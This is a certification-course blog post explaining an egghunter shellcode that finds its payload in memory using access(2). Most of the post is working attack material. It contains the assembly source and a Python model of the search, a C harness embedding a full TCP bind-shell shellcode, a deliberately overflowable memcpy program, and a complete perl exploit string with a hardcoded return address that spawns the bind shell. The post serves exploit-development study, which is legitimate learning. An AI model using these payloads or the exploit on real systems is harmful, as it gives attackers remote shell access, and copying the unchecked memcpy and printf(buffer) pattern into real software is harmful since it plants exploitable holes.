Sunday, 14 August 2016

SLAE Assignment 3 - EggHunter

Objective

The objective of this task is to create an egghunting shellcode. Egghunting shellcodes are useful when the area we control after a crash is small and cannot hold a large shellcode. An egghunter normally needs very little space, and it locates our real shellcode in memory by searching for a known pattern (the egg) placed in front of it.

The best paper to learn about egghunter implementation is "Safely Searching Process Virtual Address Space" by skape. The author provides three egghunter methods for Linux.

They are the access(2), access(2) revisited and sigaction(2) system call methods.

I am focusing on the access(2) revisited method for this post. The following is the nasm file I created.


rtv@dink0ism:~/Exercise3$ cat egg_hunter2.nasm
; Egg - 0xF890F990 (stored in memory as \x90\xf9\x90\xf8, repeated twice)
global _start
        section .text
_start:
        xor edx, edx            ; edx holds the address currently being examined
alignpage:
        or dx, 0xfff            ; move to the last byte of the current page
nextaddr:
        inc edx                 ; next address (first byte of the next page after a fault)
        lea ebx, [edx+0x4]      ; pathname pointer for access(2); +4 so the probe covers the second half of the egg
        push byte 0x21          ; system call number for access(2)
        pop eax
        int 0x80
        cmp al, 0xf2            ; -EFAULT (-14) in al means the address is unmapped
        je alignpage            ; unmapped: skip the rest of this page with a single syscall
        mov eax, 0xF890F990     ; egg
        mov edi, edx            ; scasd compares eax with [edi] and advances edi by 4
        scasd
        jne nextaddr            ; first half does not match: try the next address
        scasd
        jne nextaddr            ; second half does not match: a lone copy of the key is not the egg
        jmp edi                 ; edi now points just past the egg, at our shellcode


The following are the major steps.
  1. Initialize the edx register
  2. Perform a page alignment operation
  3. Trigger the access(2) system call
  4. Check if we got an EFAULT
  5. Start the comparison of the egg once the address is valid
  6. If we've found our egg, pass execution to it
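The walk through memory that these steps describe, as an added Python model written for this page (not the author's code): memory is a constructed sparse map of 4 KiB pages, access(2) is simulated to fail with EFAULT on an unmapped pointer, and the loop follows the nasm label for label, showing that one failed syscall skips a whole page while a lone copy of the 4-byte key (such as the hunter's own mov immediate) is not taken as the egg.

```python
import struct

PAGE = 0x1000
EFAULT, ENOENT = 14, 2
EGG_WORD = 0xF890F990                  # the immediate in "mov eax, 0xF890F990"
EGG = struct.pack("<I", EGG_WORD) * 2  # in memory: \x90\xf9\x90\xf8 twice
class Memory:
    """Constructed sparse address space: only pages in `bases` are mapped."""
    def __init__(self, bases):
        self.pages = {b: bytearray(PAGE) for b in bases}

    def read(self, addr, n):
        """Return n bytes at addr, or None if any of them is unmapped."""
        out = bytearray()
        for a in range(addr, addr + n):
            page = self.pages.get(a & ~(PAGE - 1))
            if page is None:
                return None
            out.append(page[a & (PAGE - 1)])
        return bytes(out)

    def write(self, addr, data):
        for i, b in enumerate(data):
            self.pages[(addr + i) & ~(PAGE - 1)][(addr + i) & (PAGE - 1)] = b

    def access(self, pathname):
        """Simulated access(2): -EFAULT on a bad pointer, else -ENOENT (the kernel's copy of the string up to its NUL is ignored)."""
        return -EFAULT if self.read(pathname, 1) is None else -ENOENT

def hunt(mem, limit=0x100000):
    """Mirror the nasm loop; return (address just past the egg, syscalls made)."""
    edx, syscalls = 0, 0               # xor edx, edx
    edx |= 0xFFF                       # alignpage: or dx, 0xfff
    while True:
        edx += 1                       # nextaddr: inc edx
        if edx >= limit:               # bound added so the model terminates
            return None, syscalls
        syscalls += 1                  # lea ebx,[edx+4]; push 0x21; pop eax; int 0x80
        if mem.access(edx + 4) == -EFAULT:   # cmp al, 0xf2
            edx |= 0xFFF               # je alignpage: one syscall skips the whole page
            continue
        if mem.read(edx, 8) == EGG:    # scasd / jne twice: both halves must match
            return edx + 8, syscalls   # jmp edi: edi already points past the egg

# Constructed layout: a page holding the hunter's own "mov eax" bytes (one copy of
# the key, which must not match), three unmapped pages, then the egg and a NOP sled.
mem = Memory([0x1000, 0x5000])
mem.write(0x1010, bytes.fromhex("b890f990f8"))
mem.write(0x5123, EGG + b"\x90" * 16)
print("egg found at %#x after %d syscalls" % hunt(mem))
```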
Let's create a sample program to test the egg hunting code. It uses a TCP bind shellcode which listens on port 11111 as the final payload.



rtv@dink0ism:~/Exercise3$ cat shellcodeegg.c
/* build with: gcc -fno-stack-protector -z execstack shellcodeegg.c -o shellcodeegg */
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

/* large enough for the 35-byte egghunter and its NUL terminator */
unsigned char egghunter[64];

int main()
{
  /* bind shellcode, port 11111, prefixed with the egg */
  unsigned char shellcode[256] = \
"\x90\xf9\x90\xf8\x90\xf9\x90\xf8" /* Egg Identifier */
"\x6a\x06\x6a\x01\x6a\x02\x31\xdb\xb3\x01\x31\xc9\x89\xe1\x31\xc0\xb0\x66\xcd\x80\x89\xc6\x31\xdb\x53\x66\x68\x2b\x67\x66\x6a\x02\x89\xe1\x6a\x10\x51\x56\xb3\x02\x89\xe1\x31\xc0\xb0\x66\xcd\x80\x6a\x01\x56\x31\xdb\xb3\x04\x89\xe1\x31\xc0\xb0\x66\xcd\x80\x31\xdb\x53\x53\x56\xb3\x05\x89\xe1\x31\xc0\xb0\x66\xcd\x80\x89\xc3\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89\xe1\xcd\x80";
  printf("Shellcode: %zu bytes\n", strlen(shellcode));
  /* egg hunter code: searches memory for the egg and jumps just past it */
  strcpy(egghunter,"\x31\xd2\x66\x81\xca\xff\x0f\x42\x8d\x5a\x04\x6a\x21\x58\xcd\x80\x3c\xf2\x74\xee\xb8\x90\xf9\x90\xf8\x89\xd7\xaf\x75\xe9\xaf\x75\xe6\xff\xe7");
  printf("Egghunter: %zu bytes\n", strlen(egghunter));
  /* run the egghunter; it finds the egg in front of shellcode[] and executes the payload */
  int (*ret)() = (int(*)())egghunter;
  ret();
  return 0;
}
Let's compile and execute the program.

It works, and we get our bind shell after connecting to port 11111.

 

Practical Execution

Now we can try the same in an actual scenario.

I will be using the code below, which is vulnerable to a stack-based overflow.


#include <stdio.h>
#include <string.h>

int main(int argc, char *argv[])
{
    char buffer[256];
    /* the whole argument is copied into a 256-byte buffer with no length check:
       this is the stack-based overflow */
    memcpy(buffer, argv[1], strlen(argv[1]));
    printf(buffer);
    return 0;
}

After some basic fuzzing I was able to identify that the buffer overflows if we give 272 characters as input.


The final four bytes are the EIP. Also, the buffer starts at 0xbffff3b0.

Next we will try our exploit, which uses egg hunting.

The final exploit should look like this:

EGGHUNTER + 99 NOPS + SHELLCODE + EIP

which is


$(perl -e 'printf "\x31\xd2\x66\x81\xca\xff\x0f\x42\x8d\x5a\x04\x6a\x21\x58\xcd\x80\x3c\xf2\x74\xee\xb8\x90\xf9\x90\xf8\x89\xd7\xaf\x75\xe9\xaf\x75\xe6\xff\xe7" . "\x90" x 99 . "\x90\xf9\x90\xf8\x90\xf9\x90\xf8\x6a\x06\x6a\x01\x6a\x02\x31\xdb\xb3\x01\x31\xc9\x89\xe1\x31\xc0\xb0\x66\xcd\x80\x89\xc6\x31\xdb\x53\x66\x68\x2b\x67\x66\x6a\x02\x89\xe1\x6a\x10\x51\x56\xb3\x02\x89\xe1\x31\xc0\xb0\x66\xcd\x80\x6a\x01\x56\x31\xdb\xb3\x04\x89\xe1\x31\xc0\xb0\x66\xcd\x80\x31\xdb\x53\x53\x56\xb3\x05\x89\xe1\x31\xc0\xb0\x66\xcd\x80\x89\xc3\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89\xe1\xcd\x80" . "\xb0\xf3\xff\xbf"')

So we will try this out now and see the outcome.


As expected, we got our shellcode working.

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification
Student ID: SLAE – 739

All the files used can be found here https://github.com/rtv7/SLAE
